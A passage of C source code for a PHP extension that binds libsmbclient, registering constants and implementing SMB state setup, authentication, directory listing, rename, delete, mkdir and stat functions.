SMBCLIENT_CONST(SMBCLIENT_OPT_CASE_SENSITIVE);
SMBCLIENT_CONST(SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT);
SMBCLIENT_CONST(SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_KERBEROS);
SMBCLIENT_CONST(SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS);
SMBCLIENT_CONST(SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_CCACHE);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_NT_HASH);
SMBCLIENT_CONST(SMBCLIENT_OPT_NETBIOS_NAME);
SMBCLIENT_CONST(SMBCLIENT_OPT_WORKGROUP);
SMBCLIENT_CONST(SMBCLIENT_OPT_USER);
SMBCLIENT_CONST(SMBCLIENT_OPT_PORT);
SMBCLIENT_CONST(SMBCLIENT_OPT_TIMEOUT);
#undef SMBCLIENT_CONST
/* Constants for use with SMBCLIENT_OPT_OPENSHAREMODE: */
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_DOS", SMBC_SHAREMODE_DENY_DOS, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_ALL", SMBC_SHAREMODE_DENY_ALL, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_WRITE", SMBC_SHAREMODE_DENY_WRITE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_READ", SMBC_SHAREMODE_DENY_READ, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_NONE", SMBC_SHAREMODE_DENY_NONE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_SHAREMODE_DENY_FCB", SMBC_SHAREMODE_DENY_FCB, CONST_PERSISTENT | CONST_CS);
/* Constants for use with SMBCLIENT_OPT_ENCRYPTLEVEL: */
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_NONE", SMBC_ENCRYPTLEVEL_NONE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_REQUEST", SMBC_ENCRYPTLEVEL_REQUEST, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_ENCRYPTLEVEL_REQUIRE", SMBC_ENCRYPTLEVEL_REQUIRE, CONST_PERSISTENT | CONST_CS);
/* Constants for the VFS functions: */
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_RDONLY", SMBC_VFS_FEATURE_RDONLY, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_DFS", SMBC_VFS_FEATURE_DFS, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_CASE_INSENSITIVE", SMBC_VFS_FEATURE_CASE_INSENSITIVE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_VFS_NO_UNIXCIFS", SMBC_VFS_FEATURE_NO_UNIXCIFS, CONST_PERSISTENT | CONST_CS);
le_smbclient_state = zend_register_list_destructors_ex(smbclient_state_dtor, NULL, PHP_SMBCLIENT_STATE_NAME, module_number);
le_smbclient_file = zend_register_list_destructors_ex(smbclient_file_dtor, NULL, PHP_SMBCLIENT_FILE_NAME, module_number);
php_register_url_stream_wrapper("smb", &php_stream_smb_wrapper TSRMLS_CC);
	/* Register under the old name so code using extension_loaded('libsmbclient') keeps working: */
zend_register_internal_module(&old_module_entry TSRMLS_CC);
return SUCCESS;
}
PHP_RINIT_FUNCTION(smbclient)
{
return SUCCESS;
}
PHP_MSHUTDOWN_FUNCTION(smbclient)
{
return SUCCESS;
}
PHP_RSHUTDOWN_FUNCTION(smbclient)
{
php_smb_pool_cleanup(TSRMLS_C);
return SUCCESS;
}
PHP_MINFO_FUNCTION(smbclient)
{
php_info_print_table_start();
php_info_print_table_row(2, "smbclient Support", "enabled");
php_info_print_table_row(2, "smbclient extension Version", PHP_SMBCLIENT_VERSION);
php_info_print_table_row(2, "libsmbclient library Version", smbc_version());
php_info_print_table_end();
}
static int
ctx_init_getauth (zval *z, char **dest, int *destlen, char *varname)
{
if (*dest != NULL) {
efree(*dest);
*dest = NULL;
}
*destlen = 0;
if (z == NULL) {
return 1;
}
switch (Z_TYPE_P(z))
{
case IS_NULL:
return 1;
#if PHP_MAJOR_VERSION >= 7
case IS_TRUE:
php_error(E_WARNING, "invalid value for %s", varname);
return 0;
case IS_FALSE:
return 1;
#else
case IS_BOOL:
if (Z_LVAL_P(z) == 1) {
php_error(E_WARNING, "invalid value for %s", varname);
return 0;
}
return 1;
#endif
case IS_STRING:
*destlen = Z_STRLEN_P(z);
*dest = estrndup(Z_STRVAL_P(z), *destlen);
return 1;
default:
php_error(E_WARNING, "invalid datatype for %s", varname);
return 0;
}
}
php_smbclient_state *
php_smbclient_state_new (php_stream_context *context, int init TSRMLS_DC)
{
php_smbclient_state *state;
SMBCCTX *ctx;
if ((ctx = smbc_new_context()) == NULL) {
switch (errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't create smbclient state: insufficient memory"); break;
default: php_error(E_WARNING, "Couldn't create smbclient state: unknown error (%d)", errno); break;
};
return NULL;
}
state = emalloc(sizeof(php_smbclient_state));
state->ctx = ctx;
state->wrkg = NULL;
state->user = NULL;
state->pass = NULL;
state->wrkglen = 0;
state->userlen = 0;
state->passlen = 0;
state->err = 0;
smbc_setFunctionAuthDataWithContext(state->ctx, smbclient_auth_func);
/* Must also save a pointer to the state object inside the context, to
* find the state from the context in the auth function: */
smbc_setOptionUserData(ctx, (void *)state);
/* Force full, modern timenames when getting xattrs: */
smbc_setOptionFullTimeNames(state->ctx, 1);
if (context) {
#if PHP_MAJOR_VERSION >= 7
zval *tmpzval;
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "workgroup"))) {
if (ctx_init_getauth(tmpzval, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "username"))) {
if (ctx_init_getauth(tmpzval, &state->user, &state->userlen, "username") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "password"))) {
if (ctx_init_getauth(tmpzval, &state->pass, &state->passlen, "password") == 0) {
php_smbclient_state_free(state);
return NULL;
}
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "minproto"))) {
smbc_setOptionProtocols(state->ctx, Z_STRVAL_P(tmpzval), NULL);
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "maxproto"))) {
smbc_setOptionProtocols(state->ctx, NULL, Z_STRVAL_P(tmpzval));
}
#endif
#else
zval **tmpzval;
if (php_stream_context_get_option(context, "smb", "workgroup", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
if (php_stream_context_get_option(context, "smb", "username", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->user, &state->userlen, "username") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
if (php_stream_context_get_option(context, "smb", "password", &tmpzval) == SUCCESS) {
if (ctx_init_getauth(*tmpzval, &state->pass, &state->passlen, "password") == 0) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
if (php_stream_context_get_option(context, "smb", "minproto", &tmpzval) == SUCCESS) {
smbc_setOptionProtocols(state->ctx, Z_STRVAL_PP(tmpzval), NULL);
}
if (php_stream_context_get_option(context, "smb", "maxproto", &tmpzval) == SUCCESS) {
smbc_setOptionProtocols(state->ctx, NULL, Z_STRVAL_PP(tmpzval));
}
#endif
#endif
}
if (init) {
if (php_smbclient_state_init(state TSRMLS_CC)) {
php_smbclient_state_free(state TSRMLS_CC);
return NULL;
}
}
return state;
}
PHP_FUNCTION(smbclient_state_new)
{
php_smbclient_state *state;
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
if ((state = php_smbclient_state_new(NULL, 0 TSRMLS_CC)) == NULL) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(state, le_smbclient_state));
#else
ZEND_REGISTER_RESOURCE(return_value, state, le_smbclient_state);
#endif
}
PHP_FUNCTION(smbclient_version)
{
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(PHP_SMBCLIENT_VERSION);
#else
RETURN_STRING(PHP_SMBCLIENT_VERSION, 1);
#endif
}
PHP_FUNCTION(smbclient_library_version)
{
if (zend_parse_parameters_none() == FAILURE) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(smbc_version());
#else
RETURN_STRING(smbc_version(), 1);
#endif
}
int
php_smbclient_state_init (php_smbclient_state *state TSRMLS_DC)
{
SMBCCTX *ctx;
if ((ctx = smbc_init_context(state->ctx)) != NULL) {
state->ctx = ctx;
return 0;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't init SMB context: null context given"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't init SMB context: insufficient memory"); break;
case ENOENT: php_error(E_WARNING, "Couldn't init SMB context: cannot load smb.conf"); break;
default: php_error(E_WARNING, "Couldn't init SMB context: unknown error (%d)", errno); break;
}
return 1;
}
#if PHP_MAJOR_VERSION >= 7
#define SMB_FETCH_RESOURCE(_state, _type, _zval, _name, _le) \
if ((_state = (_type)zend_fetch_resource(Z_RES_P(*_zval), _name, _le)) == NULL) { \
RETURN_FALSE; \
}
#else
#define SMB_FETCH_RESOURCE(_state, _type, _zval, _name, _le) \
ZEND_FETCH_RESOURCE(_state, _type, _zval, -1, _name, _le);
#endif
#define STATE_FROM_ZSTATE \
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state); \
if (state == NULL || state->ctx == NULL) { \
php_error(E_WARNING, PHP_SMBCLIENT_STATE_NAME " not found"); \
RETURN_FALSE; \
}
#define FILE_FROM_ZFILE \
SMB_FETCH_RESOURCE(file, SMBCFILE *, &zfile, PHP_SMBCLIENT_FILE_NAME, le_smbclient_file); \
if (file == NULL) { \
php_error(E_WARNING, PHP_SMBCLIENT_FILE_NAME " not found"); \
RETURN_FALSE; \
}
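/* Typical PHP-side lifecycle of a state resource (an illustrative sketch, not
 * compiled code; the credentials are placeholders):
 *
 *   $state = smbclient_state_new();
 *   smbclient_state_init($state, null, 'guest', '');   // workgroup, user, password
 *   // ... use $state with the functions below ...
 *   smbclient_state_free($state);
 */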
PHP_FUNCTION(smbclient_state_init)
{
zval *zstate;
zval *zwrkg = NULL;
zval *zuser = NULL;
zval *zpass = NULL;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r|zzz", &zstate, &zwrkg, &zuser, &zpass) != SUCCESS) {
RETURN_FALSE;
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state->ctx == NULL) {
php_error(E_WARNING, "Couldn't init SMB context: context is null");
RETURN_FALSE;
}
if (ctx_init_getauth(zwrkg, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
RETURN_FALSE;
}
if (ctx_init_getauth(zuser, &state->user, &state->userlen, "username") == 0) {
RETURN_FALSE;
}
if (ctx_init_getauth(zpass, &state->pass, &state->passlen, "password") == 0) {
RETURN_FALSE;
}
if (php_smbclient_state_init(state TSRMLS_CC)) {
RETURN_FALSE;
}
RETURN_TRUE;
}
PHP_FUNCTION(smbclient_state_errno)
{
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &zstate) != SUCCESS) {
RETURN_LONG(0);
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
RETURN_LONG(state->err);
}
PHP_FUNCTION(smbclient_state_free)
{
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r", &zstate) != SUCCESS) {
RETURN_FALSE;
}
SMB_FETCH_RESOURCE(state, php_smbclient_state *, &zstate, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state->ctx == NULL) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zstate));
#else
zend_list_delete(Z_LVAL_P(zstate));
#endif
RETURN_TRUE;
}
if (smbc_free_context(state->ctx, 1) == 0) {
state->ctx = NULL;
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zstate));
#else
zend_list_delete(Z_LVAL_P(zstate));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBUSY: php_error(E_WARNING, "Couldn't destroy smbclient state: connection in use"); break;
case EBADF: php_error(E_WARNING, "Couldn't destroy smbclient state: invalid handle"); break;
default: php_error(E_WARNING, "Couldn't destroy smbclient state: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
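/* Illustrative PHP-side directory listing (a sketch; the URL is a placeholder):
 *
 *   $dir = smbclient_opendir($state, 'smb://server/share/');
 *   while (($entry = smbclient_readdir($state, $dir)) !== false) {
 *       echo $entry['type'], ' ', $entry['name'], "\n";
 *   }
 *   smbclient_closedir($state, $dir);
 */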
PHP_FUNCTION(smbclient_opendir)
{
char *path;
strsize_t path_len;
zval *zstate;
SMBCFILE *dir;
smbc_opendir_fn smbc_opendir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &path, &path_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_opendir = smbc_getFunctionOpendir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((dir = smbc_opendir(state->ctx, path)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(dir, le_smbclient_file));
#else
ZEND_REGISTER_RESOURCE(return_value, dir, le_smbclient_file);
#endif
return;
}
hide_password(path, path_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't open SMB directory %s: Permission denied", path); break;
case EINVAL: php_error(E_WARNING, "Couldn't open SMB directory %s: Invalid URL", path); break;
case ENOENT: php_error(E_WARNING, "Couldn't open SMB directory %s: Path does not exist", path); break;
case ENOMEM: php_error(E_WARNING, "Couldn't open SMB directory %s: Insufficient memory", path); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't open SMB directory %s: Not a directory", path); break;
case EPERM: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup not found", path); break;
case ENODEV: php_error(E_WARNING, "Couldn't open SMB directory %s: Workgroup or server not found", path); break;
default: php_error(E_WARNING, "Couldn't open SMB directory %s: unknown error (%d)", path, errno); break;
}
RETURN_FALSE;
}
static char *
type_to_string (unsigned int type)
{
switch (type) {
case SMBC_WORKGROUP: return "workgroup";
case SMBC_SERVER: return "server";
case SMBC_FILE_SHARE: return "file share";
case SMBC_PRINTER_SHARE: return "printer share";
case SMBC_COMMS_SHARE: return "communication share";
case SMBC_IPC_SHARE: return "IPC share";
case SMBC_DIR: return "directory";
case SMBC_FILE: return "file";
case SMBC_LINK: return "link";
}
return "unknown";
}
PHP_FUNCTION(smbclient_readdir)
{
struct smbc_dirent *dirent;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_readdir_fn smbc_readdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_readdir = smbc_getFunctionReaddir(state->ctx)) == NULL) {
RETURN_FALSE;
}
errno = 0;
if ((dirent = smbc_readdir(state->ctx, file)) == NULL) {
switch (state->err = errno) {
case 0: RETURN_FALSE;
case EBADF: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": Not a directory resource"); break;
case EINVAL: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": State resource not initialized"); break;
default: php_error(E_WARNING, "Couldn't read " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
#if PHP_MAJOR_VERSION >= 7
add_assoc_string(return_value, "type", type_to_string(dirent->smbc_type));
add_assoc_stringl(return_value, "comment", dirent->comment, dirent->commentlen);
add_assoc_stringl(return_value, "name", dirent->name, dirent->namelen);
#else
add_assoc_string(return_value, "type", type_to_string(dirent->smbc_type), 1);
add_assoc_stringl(return_value, "comment", dirent->comment, dirent->commentlen, 1);
add_assoc_stringl(return_value, "name", dirent->name, dirent->namelen, 1);
#endif
}
PHP_FUNCTION(smbclient_closedir)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_closedir_fn smbc_closedir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_closedir = smbc_getFunctionClosedir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_closedir(state->ctx, file) == 0) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zfile));
#else
zend_list_delete(Z_LVAL_P(zfile));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't close " PHP_SMBCLIENT_FILE_NAME ": Not a directory resource"); break;
default: php_error(E_WARNING, "Couldn't close " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
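/* Illustrative PHP-side rename (a sketch; the URLs are placeholders). The same
 * state resource may be passed twice when source and destination are reachable
 * through one connection:
 *
 *   smbclient_rename($state, 'smb://server/share/old.txt',
 *                    $state, 'smb://server/share/new.txt');
 */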
PHP_FUNCTION(smbclient_rename)
{
char *ourl, *nurl;
strsize_t ourl_len, nurl_len;
zval *zstate_old;
zval *zstate_new;
smbc_rename_fn smbc_rename;
php_smbclient_state *state_old;
php_smbclient_state *state_new;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsrs", &zstate_old, &ourl, &ourl_len, &zstate_new, &nurl, &nurl_len) == FAILURE) {
return;
}
SMB_FETCH_RESOURCE(state_old, php_smbclient_state *, &zstate_old, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
SMB_FETCH_RESOURCE(state_new, php_smbclient_state *, &zstate_new, PHP_SMBCLIENT_STATE_NAME, le_smbclient_state);
if (state_old == NULL || state_old->ctx == NULL) {
php_error(E_WARNING, "old " PHP_SMBCLIENT_STATE_NAME " is null");
RETURN_FALSE;
}
if (state_new == NULL || state_new->ctx == NULL) {
php_error(E_WARNING, "new " PHP_SMBCLIENT_STATE_NAME " is null");
RETURN_FALSE;
}
if ((smbc_rename = smbc_getFunctionRename(state_old->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_rename(state_old->ctx, ourl, state_new->ctx, nurl) == 0) {
RETURN_TRUE;
}
hide_password(ourl, ourl_len);
switch (state_old->err = errno) {
		case EISDIR: php_error(E_WARNING, "Couldn't rename %s: existing url is not a directory", ourl); break;
		case EACCES: php_error(E_WARNING, "Couldn't rename %s: Permission denied", ourl); break;
		case EINVAL: php_error(E_WARNING, "Couldn't rename %s: Invalid URL", ourl); break;
		case ENOENT: php_error(E_WARNING, "Couldn't rename %s: Path does not exist", ourl); break;
		case ENOMEM: php_error(E_WARNING, "Couldn't rename %s: Insufficient memory", ourl); break;
		case ENOTDIR: php_error(E_WARNING, "Couldn't rename %s: Not a directory", ourl); break;
		case EPERM: php_error(E_WARNING, "Couldn't rename %s: Workgroup not found", ourl); break;
		case EXDEV: php_error(E_WARNING, "Couldn't rename %s: Old and new name are not on the same server or share", ourl); break;
		case EEXIST: php_error(E_WARNING, "Couldn't rename %s: new name already exists", ourl); break;
		default: php_error(E_WARNING, "Couldn't rename %s: unknown error (%d)", ourl, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_unlink)
{
char *url;
strsize_t url_len;
zval *zstate;
smbc_unlink_fn smbc_unlink;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_unlink = smbc_getFunctionUnlink(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_unlink(state->ctx, url) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't delete %s: Permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't delete %s: Invalid URL", url); break;
case ENOENT: php_error(E_WARNING, "Couldn't delete %s: Path does not exist", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't delete %s: Insufficient memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't delete %s: Workgroup not found", url); break;
case EISDIR: php_error(E_WARNING, "Couldn't delete %s: It is a Directory (use rmdir instead)", url); break;
case EBUSY: php_error(E_WARNING, "Couldn't delete %s: Device or resource busy", url); break;
default: php_error(E_WARNING, "Couldn't delete %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_mkdir)
{
char *path = NULL;
strsize_t path_len;
zend_long mode = 0777; /* Same as PHP's native mkdir() */
zval *zstate;
smbc_mkdir_fn smbc_mkdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|l", &zstate, &path, &path_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_mkdir = smbc_getFunctionMkdir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_mkdir(state->ctx, path, (mode_t)mode) == 0) {
RETURN_TRUE;
}
hide_password(path, path_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't create SMB directory %s: Permission denied", path); break;
case EINVAL: php_error(E_WARNING, "Couldn't create SMB directory %s: Invalid URL", path); break;
case ENOENT: php_error(E_WARNING, "Couldn't create SMB directory %s: Path does not exist", path); break;
case ENOMEM: php_error(E_WARNING, "Couldn't create SMB directory %s: Insufficient memory", path); break;
case EEXIST: php_error(E_WARNING, "Couldn't create SMB directory %s: Directory already exists", path); break;
default: php_error(E_WARNING, "Couldn't create SMB directory %s: unknown error (%d)", path, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_rmdir)
{
char *url;
strsize_t url_len;
zval *zstate;
smbc_rmdir_fn smbc_rmdir;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_rmdir = smbc_getFunctionRmdir(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_rmdir(state->ctx, url) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EACCES: php_error(E_WARNING, "Couldn't delete %s: Permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't delete %s: Invalid URL", url); break;
case ENOENT: php_error(E_WARNING, "Couldn't delete %s: Path does not exist", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't delete %s: Insufficient memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't delete %s: Workgroup not found", url); break;
case ENOTEMPTY: php_error(E_WARNING, "Couldn't delete %s: It is not empty", url); break;
default: php_error(E_WARNING, "Couldn't delete %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
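/* Illustrative PHP-side stat call (a sketch; the URL is a placeholder). The
 * returned array carries both numeric and named keys, mirroring PHP's stat():
 *
 *   $st = smbclient_stat($state, 'smb://server/share/file.txt');
 *   echo $st['size'], ' bytes, modified ', date('c', $st['mtime']), "\n";
 */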
PHP_FUNCTION(smbclient_stat)
{
char *file;
struct stat statbuf;
strsize_t file_len;
zval *zstate;
smbc_stat_fn smbc_stat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &file, &file_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_stat = smbc_getFunctionStat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_stat(state->ctx, file, &statbuf) < 0) {
hide_password(file, file_len);
switch (state->err = errno) {
case ENOENT: php_error(E_WARNING, "Couldn't stat %s: Does not exist", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't stat: null URL or smbc_init failed"); break;
case EACCES: php_error(E_WARNING, "Couldn't stat %s: Permission denied", file); break;
case ENOMEM: php_error(E_WARNING, "Couldn't stat %s: Out of memory", file); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't stat %s: Not a directory", file); break;
default: php_error(E_WARNING, "Couldn't stat %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_index_long(return_value, 0, statbuf.st_dev);
add_index_long(return_value, 1, statbuf.st_ino);
add_index_long(return_value, 2, statbuf.st_mode);
add_index_long(return_value, 3, statbuf.st_nlink);
add_index_long(return_value, 4, statbuf.st_uid);
add_index_long(return_value, 5, statbuf.st_gid);
add_index_long(return_value, 6, statbuf.st_rdev);
add_index_long(return_value, 7, statbuf.st_size);
add_index_long(return_value, 8, statbuf.st_atime);
add_index_long(return_value, 9, statbuf.st_mtime);
add_index_long(return_value, 10, statbuf.st_ctime);
add_index_long(return_value, 11, statbuf.st_blksize);
add_index_long(return_value, 12, statbuf.st_blocks);
add_assoc_long(return_value, "dev", statbuf.st_dev);
add_assoc_long(return_value, "ino", statbuf.st_ino);
add_assoc_long(return_value, "mode", statbuf.st_mode);
add_assoc_long(return_value, "nlink", statbuf.st_nlink);
add_assoc_long(return_value, "uid", statbuf.st_uid);
add_assoc_long(return_value, "gid", statbuf.st_gid);
add_assoc_long(return_value, "rdev", statbuf.st_rdev);
add_assoc_long(return_value, "size", statbuf.st_size);
add_assoc_long(return_value, "atime", statbuf.st_atime);
add_assoc_long(return_value, "mtime", statbuf.st_mtime);
add_assoc_long(return_value, "ctime", statbuf.st_ctime);
add_assoc_long(return_value, "blksize", statbuf.st_blksize);
add_assoc_long(return_value, "blocks", statbuf.st_blocks);
}
PHP_FUNCTION(smbclient_fstat)
{
struct stat statbuf;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_fstat_fn smbc_fstat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_fstat = smbc_getFunctionFstat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_fstat(state->ctx, file, &statbuf) < 0) {
switch (state->err = errno) {
case ENOENT: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Does not exist"); break;
case EINVAL: php_error(E_WARNING, "Couldn't fstat: null resource or smbc_init failed"); break;
case EACCES: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Permission denied"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Out of memory"); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": Not a directory"); break;
default: php_error(E_WARNING, "Couldn't fstat " PHP_SMBCLIENT_FILE_NAME ": unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_index_long(return_value, 0, statbuf.st_dev);
add_index_long(return_value, 1, statbuf.st_ino);
add_index_long(return_value, 2, statbuf.st_mode);
add_index_long(return_value, 3, statbuf.st_nlink);
add_index_long(return_value, 4, statbuf.st_uid);
add_index_long(return_value, 5, statbuf.st_gid);
add_index_long(return_value, 6, statbuf.st_rdev);
add_index_long(return_value, 7, statbuf.st_size);
add_index_long(return_value, 8, statbuf.st_atime);
add_index_long(return_value, 9, statbuf.st_mtime);
add_index_long(return_value, 10, statbuf.st_ctime);
add_index_long(return_value, 11, statbuf.st_blksize);
add_index_long(return_value, 12, statbuf.st_blocks);
add_assoc_long(return_value, "dev", statbuf.st_dev);
add_assoc_long(return_value, "ino", statbuf.st_ino);
add_assoc_long(return_value, "mode", statbuf.st_mode);
add_assoc_long(return_value, "nlink", statbuf.st_nlink);
add_assoc_long(return_value, "uid", statbuf.st_uid);
add_assoc_long(return_value, "gid", statbuf.st_gid);
add_assoc_long(return_value, "rdev", statbuf.st_rdev);
add_assoc_long(return_value, "size", statbuf.st_size);
add_assoc_long(return_value, "atime", statbuf.st_atime);
add_assoc_long(return_value, "mtime", statbuf.st_mtime);
add_assoc_long(return_value, "ctime", statbuf.st_ctime);
add_assoc_long(return_value, "blksize", statbuf.st_blksize);
add_assoc_long(return_value, "blocks", statbuf.st_blocks);
}
int
flagstring_to_smbflags (const char *flags, int flags_len, int *retval TSRMLS_DC)
{
